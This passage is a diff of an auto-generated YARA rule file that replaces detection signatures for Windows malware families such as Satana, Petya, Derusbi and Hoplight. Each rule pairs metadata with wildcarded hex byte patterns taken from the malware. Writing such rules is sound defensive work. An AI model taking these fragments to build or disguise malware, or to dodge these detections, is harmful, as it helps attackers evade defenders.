+		$sequence_6 = { 83f800 0f851e000000 b8???????? 50 8b5d10 8b1b }
+		$sequence_7 = { b8???????? 8945d8 8d45d8 50 6800000000 ff35???????? 8d45e0 }
+		$sequence_8 = { 837d1400 0f8507000000 c7451401000000 837d1000 0f85aa020000 6802000080 6a00 }
+		$sequence_9 = { 53 55 56 8b742430 85f6 57 750a }
 
 	condition:
-		7 of them and filesize < 224112
+		7 of them and filesize < 737280
 }
-rule MALPEDIA_Win_Keymarble_Auto : FILE
+rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "447d0650-610a-5703-8049-ac11f5ff96b2"
+		id = "9750d3af-ce6a-5fd6-82be-e974a57fe309"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.keymarble_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_qbp_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "e486a69a145cdf890bda9b04db818a44b92722887c60b9c58647de19116cd1c1"
+		logic_hash = "29a4c00125a8c7fc3f2d53e8e3fdae1793d32ea093da5da3654341cbb647aaec"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125831,32 +125708,32 @@ rule MALPEDIA_Win_Keymarble_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 50 e8???????? 83c404 56 6a40 }
-		$sequence_1 = { 6a00 6a03 6800000040 57 ffd6 }
-		$sequence_2 = { ff15???????? e8???????? 99 b907000000 f7f9 }
-		$sequence_3 = { e8???????? 83c408 85c0 7407 bb7a452301 }
-		$sequence_4 = { ffd7 50 e8???????? 83c404 e8???????? 8d3470 81e6ffffff7f }
-		$sequence_5 = { e9???????? 50 6a00 6810040000 }
-		$sequence_6 = { 85db 7407 53 ff15???????? ff15???????? }
-		$sequence_7 = { e9???????? 50 6a00 6810040000 ff15???????? }
-		$sequence_8 = { ff15???????? 85db 7407 53 ff15???????? ff15???????? }
-		$sequence_9 = { 50 e8???????? 83c404 e8???????? 8d3470 81e6ffffff7f }
+		$sequence_0 = { 7f12 8b4508 0345fc 33c9 8a08 83e930 894df4 }
+		$sequence_1 = { 25ffff0000 2500800000 c1f80f 8be5 5d c3 55 }
+		$sequence_2 = { 8b5508 52 ff15???????? 8d85f0feffff 50 }
+		$sequence_3 = { 0fbf94414c520000 81fa00100000 7505 e9???????? 0fbf4508 8b4df8 }
+		$sequence_4 = { 81e1ff000000 51 8b4de4 e8???????? }
+		$sequence_5 = { aa 837d0800 7564 6800010000 6a00 8d85ecfdffff 50 }
+		$sequence_6 = { 66898c5038770000 0fbf55f0 8b45ec 668b8c50907e0000 66894df8 }
+		$sequence_7 = { 668b9176830000 668955fc 8b45f8 668b8876830000 66d1e1 8b55f8 }
+		$sequence_8 = { 66050100 668945f4 e9???????? 66c745f80000 66c745f43a01 eb18 }
+		$sequence_9 = { 0fbf5508 0fbf45fc 8b4df8 8b75f8 668b945648100000 6689944148100000 }
 
 	condition:
-		7 of them and filesize < 1146880
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Hackbrowserdata_Auto : FILE
+rule MALPEDIA_Win_Satana_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fcd73865-5a53-59f1-9e25-a98b05a9abde"
+		id = "2e802f49-7188-54f8-af9a-7b169267990a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackbrowserdata"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hackbrowserdata_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.satana_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3594c5bb7e78e08e9a84a6093ffe67652863ced1d7b7424d638f7eb8af56002c"
+		logic_hash = "97eda1bd522e83f5fcc03e351c0ecc778e9c052cbb2ce47bd57943571eacd366"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125870,32 +125747,32 @@ rule MALPEDIA_Win_Hackbrowserdata_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffc1 4d89ea 4d89fc 4989fd 4d89e7 41394c2428 0f8e0dfaffff }
-		$sequence_1 = { f20f1005???????? 31db 49c7c0ffffffff eb3d 48890437 488bb424a0000000 4883c618 }
-		$sequence_2 = { e8???????? 488b542450 48895008 833d????????00 750a 488b9424d8000000 eb10 }
-		$sequence_3 = { e8???????? e9???????? 488b1d???????? 4881c368960000 488b442478 488b4c2448 e8???????? }
-		$sequence_4 = { ffd3 833d????????00 7507 488b742408 eb15 e8???????? 498903 }
-		$sequence_5 = { e9???????? 488d4f54 4889ca 0fb619 ffcb 8819 480fbe0a }
-		$sequence_6 = { f20f59d8 f20f581d???????? f20f59d8 f20f581d???????? f20f59d8 f20f581d???????? f20f59d9 }
-		$sequence_7 = { ffc1 39d1 7d5d 4889f7 488b7640 4c63c1 4a8d34c6 }
-		$sequence_8 = { eb13 4883c420 5d c3 48bfffffffffffff0300 4989da 4585c0 }
-		$sequence_9 = { e8???????? 498913 48895018 488b942480000000 488b5c2470 4889f9 4c89c7 }
+		$sequence_0 = { 9c 90 8b1d???????? 6a00 }
+		$sequence_1 = { 50 68???????? a3???????? e8???????? 83c408 03df }
+		$sequence_2 = { a1???????? 6a00 03d2 52 50 ffd6 8b55ec }
+		$sequence_3 = { 83c404 8bf0 660f57c0 660f1345c4 8b5dc4 8b7dac }
+		$sequence_4 = { f7c200000002 7436 660f2805???????? 90 }
+		$sequence_5 = { 0fb64c0de8 c1ea04 0fb65415e8 8850ff 8808 0fb64c35ae }
+		$sequence_6 = { 50 68???????? e8???????? 83c414 eb14 ff15???????? }
+		$sequence_7 = { 83c404 68???????? eb33 8d4db0 51 }
+		$sequence_8 = { 8bc8 d1e8 83e101 33048d00904000 3305???????? a3???????? 33c0 }
+		$sequence_9 = { 57 8d45fc 50 3308 db6819 203c53 6840200800 }
 
 	condition:
-		7 of them and filesize < 42451968
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Tinymet_Auto : FILE
+rule MALPEDIA_Win_Leouncia_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4e92467-e964-5a19-9a8e-d27b4954cbf2"
+		id = "a9724346-fb9d-57ad-b542-cb221faaaa09"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinymet_auto.yar#L1-L105"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.leouncia_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "bbccdde23def456246dacbb5efe68ad5d612883065da6028a6a7729364ff21ca"
+		logic_hash = "82ead8ce3a400451ff3f5916535aebe7ef2cee2e7927624a2fdf32a62ced8582"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125909,30 +125786,32 @@ rule MALPEDIA_Win_Tinymet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8b400c ff750c 8b00 8b00 a3???????? }
-		$sequence_1 = { 7419 a1???????? 6a00 83c005 56 }
-		$sequence_2 = { 5e 5d c3 a1???????? 56 57 6a5c }
-		$sequence_3 = { 85c0 0f8545010000 ff7508 ff15???????? 85c0 750a 68???????? }
-		$sequence_4 = { 385d10 7416 6a04 8d45fc }
-		$sequence_5 = { 8d45f0 50 8d45e8 50 e8???????? 83c410 b80033a084 }
-		$sequence_6 = { a1???????? 59 50 ff35???????? }
-		$sequence_7 = { 33c0 57 668906 e8???????? a3???????? 8d4602 50 }
+		$sequence_0 = { 50 c644141800 ff15???????? 85c0 7512 ff15???????? 83f805 }
+		$sequence_1 = { 3bf3 7519 8b35???????? 55 }
+		$sequence_2 = { 895c2464 ff15???????? 85c0 7520 }
+		$sequence_3 = { 8dbc247c040000 2bd6 8bca 89542418 8be9 c1e902 f3a5 }
+		$sequence_4 = { 7505 c6440c2820 41 3bc8 7cee 8b842434050000 56 }
+		$sequence_5 = { 50 e8???????? 8d4c2424 51 e8???????? 8b2d???????? 83c410 }
+		$sequence_6 = { e8???????? 8b4c2420 83c40c 889c0c14010000 }
+		$sequence_7 = { 8d542440 8d442450 8d8c24b4040000 52 }
+		$sequence_8 = { 8b0f 52 50 51 6a00 ff15???????? }
+		$sequence_9 = { 89942444040000 8b542434 8bc1 8bf5 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Unidentified_039_Auto : FILE
+rule MALPEDIA_Win_Molerat_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5307ab67-7df6-58f4-b452-1c07a33c71d9"
+		id = "d42e4503-ecb9-5c8a-a5c4-49076e4c4692"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_039_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.molerat_loader_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "afa5455e6fc48dacd94f7935b5ea52166f1efb72a1cca9234dab50b4c119076b"
+		logic_hash = "fb8054083b6be147b0212c1c64a0a9853635b01e04e79803ccd8499a9a7c2505"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125946,32 +125825,32 @@ rule MALPEDIA_Win_Unidentified_039_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bc8 034df4 81f1a1710000 894df8 8b45f4 8b4d0c 3bc8 }
-		$sequence_1 = { 894dfc 8b45f4 8b4df8 3bc8 7d0c ff75f8 }
-		$sequence_2 = { 837ddc00 75e6 c6460401 830eff 8bc6 2b04bd20d24100 }
-		$sequence_3 = { c745d8d9580000 8b45dc 59 59 8b4de0 }
-		$sequence_4 = { c7459c2e4c0000 c7459cd65d0000 8b459c 251f140000 89459c }
-		$sequence_5 = { 0bc1 8945d8 8b45f0 8b4df4 3bc8 7c0c }
-		$sequence_6 = { 40 663bcb 75f6 6a25 2bc2 8d4d04 51 }
-		$sequence_7 = { 6890010000 53 53 53 894538 }
-		$sequence_8 = { 0fafc1 8b4de8 2bc1 8b4dec 81e97f650000 33c1 8945f8 }
-		$sequence_9 = { 8b4dfc 0bc1 0d403a0000 8945f8 8b4508 8b4dfc 3bc8 }
+		$sequence_0 = { 8d4db8 c645fc34 e8???????? 68???????? 8d4dbc c645fc35 e8???????? }
+		$sequence_1 = { 51 c645fc42 e8???????? 83c40c }
+		$sequence_2 = { 8b08 8b11 50 8b4204 ffd0 c644243409 8b44240c }
+		$sequence_3 = { 56 a1???????? 33c4 50 8d84241c020000 64a300000000 6804010000 }
+		$sequence_4 = { 8d4c2450 c744242000000000 e8???????? 8d4c241c c644243802 e8???????? 8d442410 }
+		$sequence_5 = { ffb56cffffff c745fc02000000 e8???????? 3bc7 7585 56 ffb56cffffff }
+		$sequence_6 = { ffd0 68???????? 8d8d08feffff e8???????? 8b8508feffff 83c0f0 }
+		$sequence_7 = { c644241c02 8b442410 83c0f0 83c40c 8d500c 83c9ff f00fc10a }
+		$sequence_8 = { 83c40c 68???????? 50 8d4de0 b330 51 885dfc }
+		$sequence_9 = { 8b7d08 57 8d45e0 33f6 50 8975e8 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 688128
 }
-rule MALPEDIA_Win_Bouncer_Auto : FILE
+rule MALPEDIA_Win_Milkmaid_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d675a9d0-d309-5a64-9b07-233609ff1237"
+		id = "7da20991-98e0-57dd-8b6d-3afa27d44835"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bouncer_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.milkmaid_auto.yar#L1-L106"
 		license_url = "N/A"
-		logic_hash = "ef61499d69e0696c4532f64e6ff2b982da08dae26c600412b066491c2f5e5346"
+		logic_hash = "7d1f7f5be2aa6e035c1f331c5b3df828eca6552df1209a5dbc69d5d2d3452b78"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125985,32 +125864,30 @@ rule MALPEDIA_Win_Bouncer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8441050000 50 ff75fc e8???????? 59 59 }
-		$sequence_1 = { 8b85b4feffff 48 3bc8 731b }
-		$sequence_2 = { 50 ff15???????? 8d85a4fdffff c645dc17 50 e8???????? 83c414 }
-		$sequence_3 = { c3 55 8bec 83ec24 56 8b750c }
-		$sequence_4 = { 53 8b5d10 56 57 8b7d0c 7410 a0???????? }
-		$sequence_5 = { 8bd8 3bde 7d13 68???????? ff15???????? }
-		$sequence_6 = { 56 56 ff15???????? 8d859cf6ffff 50 8d859cf8ffff 68???????? }
-		$sequence_7 = { 50 ff15???????? 83c40c eb2e ff7508 ff15???????? }
-		$sequence_8 = { 7e33 8d85f4feffff 50 56 e8???????? 85c0 7422 }
-		$sequence_9 = { 3bc6 59 a3???????? 750c 50 ff15???????? }
+		$sequence_0 = { 8d4c2414 889c24dc280100 e8???????? 8d4c240c }
+		$sequence_1 = { 8d442408 57 50 e8???????? 83c404 33db 68???????? }
+		$sequence_2 = { 8d4c2408 e8???????? 68???????? 8d4c2408 e8???????? 8b442404 6a00 }
+		$sequence_3 = { 8a8528280100 81e1ff0f0000 33db 84c0 8a5c2918 895c2428 }
+		$sequence_4 = { 50 ff15???????? 8b74241c 8d4c2404 51 8bce }
+		$sequence_5 = { 8d4c240c c78424dc280100ffffffff e8???????? 33c0 8b8c24d4280100 5f }
+		$sequence_6 = { 8b4c240c 50 51 8d8c2480000000 c68424e428010003 e8???????? }
+		$sequence_7 = { 6a00 6a1a 6a00 ff15???????? 6aff 8d4c2408 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Phoreal_Auto : FILE
+rule MALPEDIA_Win_Hoplight_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2e1897fd-9f9a-538a-af8f-a84b5fcbe486"
+		id = "c82c3889-c1c1-5b5f-b045-d951cf697dce"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phoreal_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hoplight_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "18c8ae88c86b0c778613b0a4c96093868db37bfa76fd9a20dc86ddc9f37cec17"
+		logic_hash = "64af8d5fa666e50115627ed90a11584ace05accbe5176be041c804017c028f5b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126024,32 +125901,30 @@ rule MALPEDIA_Win_Phoreal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33ff 8d642400 8b4608 3b7e0c 731f 8b0cb8 8d04b8 }
-		$sequence_1 = { 8bd0 0355f8 83c40c 2bf7 740b 8bce 33c0 }
-		$sequence_2 = { 8d45ac 50 51 53 ffd6 85c0 750a }
-		$sequence_3 = { 2bf0 03f8 85f6 7fe0 eb03 83cfff }
-		$sequence_4 = { 2bc1 50 51 8d45cc 50 53 }
-		$sequence_5 = { 51 c7852cfeffff01000000 888534feffff e8???????? 8d8554ffffff 33d2 8d7e17 }
-		$sequence_6 = { 1bd2 f7d2 85d1 75c3 8b5c2414 33ff 8b4c2418 }
-		$sequence_7 = { 8b0d???????? 8b55fc 8d040f 2bf0 03f1 c1fe02 }
-		$sequence_8 = { c78574ffffff8992f2a7 c78578ffffffaa9e9aee c7857cffffff89a5c199 c7458067cc6aaf c74584fa1200f5 c74588efc8d4ba }
-		$sequence_9 = { 85ff 7414 8b855cffffff 50 }
+		$sequence_0 = { 488b442450 c70000000000 c705????????00000100 b800000100 eb53 488b442440 4889442428 }
+		$sequence_1 = { 0fb6542434 488b4c2450 e8???????? 488b442450 8b80ccaf0600 488b4c2450 488d8401b8af0100 }
+		$sequence_2 = { 488bcb 488905???????? ff15???????? 488d158c620400 488bcb 488905???????? ff15???????? }
+		$sequence_3 = { 488b442428 488b8018020000 4889442428 41b820020000 33d2 488b4c2430 e8???????? }
+		$sequence_4 = { 4883c004 4889842418020000 8b442414 0faf442424 8944240c 8b442414 0faf442408 }
+		$sequence_5 = { 488b4878 e8???????? b801000000 eb76 41b800420000 33d2 488b442440 }
+		$sequence_6 = { 4489442418 4889542410 48894c2408 4883ec48 488b4c2450 e8???????? 89442420 }
+		$sequence_7 = { 482bc8 488bc1 4883f801 7d0a b814ffffff e9???????? 488b8424d0000000 }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 765952
 }
-rule MALPEDIA_Win_Shadowhammer_Auto : FILE
+rule MALPEDIA_Win_Comebacker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "297b3240-9669-5c2f-9f70-bac21eea5e4b"
+		id = "19238c8d-fa63-54d2-9e85-3ef6a0f14568"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shadowhammer_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.comebacker_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "910985146f49579376d7edf79ed10031d031e34957a06d7ed180548cab7651ac"
+		logic_hash = "5042f5e1cb03a035d2e07683a701a487f9bff93086c3cbb30af6f5ad30fe783b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126063,32 +125938,37 @@ rule MALPEDIA_Win_Shadowhammer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 57 33f6 bfa8a24000 833cf55490400001 751d 8d04f550904000 }
-		$sequence_1 = { 6a69 668945ae 58 6a49 59 6a44 }
-		$sequence_2 = { 897e70 c686c800000043 c6864b01000043 c7466818934000 6a0d }
-		$sequence_3 = { 5f c3 56 8b35???????? 68287c4000 57 ffd6 }
-		$sequence_4 = { c3 55 8bec 81ec4c030000 c785e4fcffff00b006c7 c785e8fcffffdab6ace6 c785ecfcffffc25c3799 }
-		$sequence_5 = { 3d40984000 741b 3998b4000000 7513 50 e8???????? }
-		$sequence_6 = { ff45fc 8b45fc 3b45f4 7cb7 ebae 8b45f0 ebab }
-		$sequence_7 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466818934000 }
-		$sequence_8 = { 817de00c714000 7311 8b45e0 8b00 85c0 7402 ffd0 }
-		$sequence_9 = { 8b401c 8b08 3bc8 7439 }
+		$sequence_0 = { 6683f809 7f04 0430 eb02 0437 }
+		$sequence_1 = { baa2000000 4c8d0d47450300 b910000000 448d42a0 }
+		$sequence_2 = { 0fb6c2 418b8c8270c30400 81e100ff0000 4433c1 453341fc 453343fc }
+		$sequence_3 = { b801000000 418bc8 0f45c8 488d05c0150300 488d1d11aa0300 85c9 }
+		$sequence_4 = { 4c8d0583520100 418d5216 e8???????? 85c0 750a b805000000 }
+		$sequence_5 = { 6690 e8???????? 48ffc3 8bf8 b84fecc44e f7ef }
+		$sequence_6 = { 89742440 48894598 c744245068000000 c744247004010000 }
+		$sequence_7 = { 0fb6c8 8bc5 8b948e70cf0400 48c1e808 0fb6c8 81e20000ff00 }
+		$sequence_8 = { e8???????? a1???????? 8b8da8f8ffff c1e00a d1e8 2bcf }
+		$sequence_9 = { 33d2 8a54242a 8adc 8b149538600410 }
+		$sequence_10 = { 5b c3 8b74241c 8b6c2414 85f6 }
+		$sequence_11 = { 6806020000 8d8d7ef7ffff 53 51 885de8 8945e9 }
+		$sequence_12 = { 52 ff15???????? a3???????? 85c0 7440 399de8e5ffff 750a }
+		$sequence_13 = { 8b0c8d38500410 33d3 8b3cbd38500410 81e1ff000000 }
+		$sequence_14 = { 74ab 8d8df4feffff 51 e8???????? 83c404 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 1429504
 }
-rule MALPEDIA_Win_Petya_Auto : FILE
+rule MALPEDIA_Win_Derusbi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e25f6ba-0f88-5dbc-a462-9f4861151314"
+		id = "c6e0e6e7-cbdf-5891-a775-1ae225a23d68"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.petya_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.derusbi_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "e12039168edf2e4657ffd112871fe75ec301f0f0758dfc0dfdc297a04b207216"
+		logic_hash = "36fd1aba73e044d12574f8ec4270d71e7197a2500df09c018d411307abbf5635"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126102,32 +125982,32 @@ rule MALPEDIA_Win_Petya_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc7 c1e810 88442431 8bc7 c1e808 88442432 }
-		$sequence_1 = { 117c2434 33f6 0facc81c c1e204 0bf0 c1e91c }
-		$sequence_2 = { 56 8b35???????? 33c9 57 33ff 8d0486 8bd8 }
-		$sequence_3 = { 83c604 3bfb 72f0 5f 5e 5b }
-		$sequence_4 = { 0bf1 33442424 33fe 23442420 }
-		$sequence_5 = { 8b4c2420 33fe 8bf0 33da 0facc80e 33d2 c1e612 }
-		$sequence_6 = { 8bca 88442428 8bc6 c1e810 88442429 8bc6 }
-		$sequence_7 = { 56 8b750c 57 83fe01 7517 }
-		$sequence_8 = { 8bca c1e303 0facc110 897c2424 c1e810 8bc2 884c242d }
-		$sequence_9 = { 8b5d0c 33c9 56 8b7508 2bde }
+		$sequence_0 = { 85c0 75be 8b45c8 895db0 895dac 3bc3 0f84affeffff }
+		$sequence_1 = { 72e4 5e c3 55 8bec 51 53 }
+		$sequence_2 = { 6810040000 ff15???????? 8985f8fdffff 85c0 7464 }
+		$sequence_3 = { ff7508 ff15???????? 8bf0 59 85f6 740f ff7508 }
+		$sequence_4 = { 56 89442418 57 8d442424 50 8d44242c 50 }
+		$sequence_5 = { 83c108 3d00040000 72f1 e9???????? 215cc70c 8d5cc710 }
+		$sequence_6 = { 50 ff15???????? 83c40c 56 8d4c2470 51 889c2407010000 }
+		$sequence_7 = { 83c40c 8d45dc 50 ff15???????? 83f8ff 740d a810 }
+		$sequence_8 = { 53 50 ffd6 83c40c 8d442424 50 8d84242cbc0200 }
+		$sequence_9 = { 8d85b8f7ffff e8???????? 59 33c9 85c0 7e25 80b40db8fbffff99 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Lcpdot_Auto : FILE
+rule MALPEDIA_Win_Fobber_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a81ecd6b-bd4a-5150-b889-dde71e2987e1"
+		id = "910b3d1e-c7a6-55ab-b1c2-4f8035f4a57d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lcpdot_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fobber_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "d5b8eea547f6e9190b9bc0d0e04ea03ad2b12f2bfb6cbcdecca904cccb5849ef"
+		logic_hash = "3cf9174005b14188a8f0ba63481f290f2ae0ab907becb2c7edb09c680f60ed5d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126141,37 +126021,38 @@ rule MALPEDIA_Win_Lcpdot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? c705????????01000000 e8???????? 83f801 }
-		$sequence_1 = { 418bdc 4c89642438 4489642430 488d442430 }
-		$sequence_2 = { 8bf1 889d14fcffff e8???????? 8d4620 83c40c 8d5002 }
-		$sequence_3 = { c78560fbffff4b4c6763 c78564fbffff66975c5f c78568fbffff8d676a9b c7856cfbffff5254774f c78570fbffff51724647 c78574fbffff5d9293ab }
-		$sequence_4 = { 742b 488d153c300100 eb15 48ffc9 741d 448b4338 }
-		$sequence_5 = { 52 ff15???????? 8b85f0efffff 8b8de8efffff 8b5604 6a00 6a00 }
-		$sequence_6 = { e8???????? 85c0 745f 8b8db4fbffff 85c9 7e23 8b85b8fbffff }
-		$sequence_7 = { ff15???????? 85c0 7468 33d2 68fe010000 }
-		$sequence_8 = { 741e 448b4638 4585c0 7415 488d1537380100 488d8c2440020000 }
-		$sequence_9 = { 8b542460 41bb00020000 4c8d0dc990ffff 458a20 4584e4 }
-		$sequence_10 = { 8975c8 c745dc38634100 ff15???????? 6a00 56 }
-		$sequence_11 = { e9???????? 488bd3 b940000000 4889ac24a8080000 }
-		$sequence_12 = { c74594c17e92d8 c74598a0b6d79f c7459cb6e6b8cb c745a0e5b6cad0 c745a4d0def5f5 c745a8faf2f2f7 }
-		$sequence_13 = { 468d2cb500000000 41f7ed 448bda 41c1fb05 }
-		$sequence_14 = { 52 8d041f 50 e8???????? 8b861c080000 83c418 03c7 }
+		$sequence_0 = { 8b750c 8b4d10 39f7 760e }
+		$sequence_1 = { 57 51 8b7d08 30c0 31c9 f7d1 }
+		$sequence_2 = { 8d0431 39f8 7607 49 01cf }
+		$sequence_3 = { 57 e8???????? 85c0 740f 89c1 }
+		$sequence_4 = { 8d4d08 51 ff31 ffd0 }
+		$sequence_5 = { 55 89e5 ff750c 6800300000 }
+		$sequence_6 = { 0453 42 e2f6 59 }
+		$sequence_7 = { f2ae 31c0 e303 4f }
+		$sequence_8 = { 8981efc00700 0081efe82300 0081c7371300 0081c7546900 0081c7397d00 00e9 }
+		$sequence_9 = { 0f85196e0100 807dfc00 7407 8b4df8 836170fd 5e }
+		$sequence_10 = { 4d fc 02e9 5a a2???????? 92 b4ff }
+		$sequence_11 = { 0f8423050000 ff7508 e8???????? 59 59 8b4508 }
+		$sequence_12 = { 43 7706 6205???????? 294a75 f2149c }
+		$sequence_13 = { 6a52 686bb7ade9 e8???????? 83c408 }
+		$sequence_14 = { 3bc3 7524 8b451c 3bc3 }
+		$sequence_15 = { 33db 57 3bcb 0f8499840100 3bf3 0f84a2840100 }
 
 	condition:
-		7 of them and filesize < 257024
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Allaple_Auto : FILE
+rule MALPEDIA_Win_Unidentified_053_Auto : FILE
 {
 	meta:
